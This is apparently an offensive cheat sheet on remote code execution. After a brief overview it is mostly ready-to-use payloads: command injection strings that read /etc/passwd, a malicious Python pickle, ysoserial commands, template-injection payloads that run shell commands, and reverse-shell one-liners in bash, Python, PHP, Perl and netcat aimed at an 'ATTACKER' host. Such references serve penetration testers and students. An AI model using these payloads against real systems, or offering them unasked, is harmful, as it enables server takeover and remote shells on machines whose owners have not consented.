Critical | A03
💣 Remote Code Execution (RCE)
🧠 Description
RCE vulnerabilities allow attackers to execute arbitrary commands on the target server through vulnerable applications. This is the most critical vulnerability type, leading to complete system compromise.
Common RCE Vectors:
- OS Command Injection: shell metacharacters in user input
- Code Injection: eval() with user-controlled input
- Deserialization: insecure deserialization of user data
- Template Injection: SSTI in template engines
🖥️ OS Command Injection
# Linux ; whoami | whoami `whoami` $(whoami) # Windows ; whoami & whoami | whoami # Chaining commands ; cat /etc/passwd | grep root # Blind RCE (time-based) ; sleep 5 & ping -c 5 127.0.0.1
📦 Deserialization Attacks
# PHP unserialize
O:5:"user":1:{s:4:"name";s:10:"hacker";}
# Java serialized
# Use ysoserial to generate payload
java -jar ysoserial.jar CommonsCollections6 "whoami" > payload.ser
# Python pickle
import pickle
pickle.loads(b"cos\nsystem\n(S'whoami'\ntR.")
# .NET deserialization
# Use ysoserial.net
.\ysoserial.exe -f BinaryFormatter -o base64 -c "whoami"
📝 Server-Side Template Injection
# Jinja2 (Python)
{{7*7}}
{{config}}
{{''.__class__.__mro__[1].__subclasses__()}}
# Twig (PHP)
{{7*7}}
{{_self.class.getTraits()}}
# Freemarker (Java)
${7*7}
<#assign ex = "freemarker.template.utility.Execute"?new()>${ex("whoami")}
# Handlebars (JS)
{{7*7}}
{{#with "a"}}{{#with (exec "whoami")}}{{this}}{{/with}}{{/with}}
🐚 Reverse Shells
# Bash
bash -i >& /dev/tcp/ATTACKER/443 0>&1
# Python
python -c 'import socket,os,pty;s=socket.socket();s.connect(("ATTACKER",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
# PHP
php -r '$sock=fsockopen("ATTACKER",443);exec("/bin/bash -i <&3 >&3 2>&3");'
# Perl
perl -e 'use Socket;$i="ATTACKER";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");'
# Netcat
nc -e /bin/bash ATTACKER 443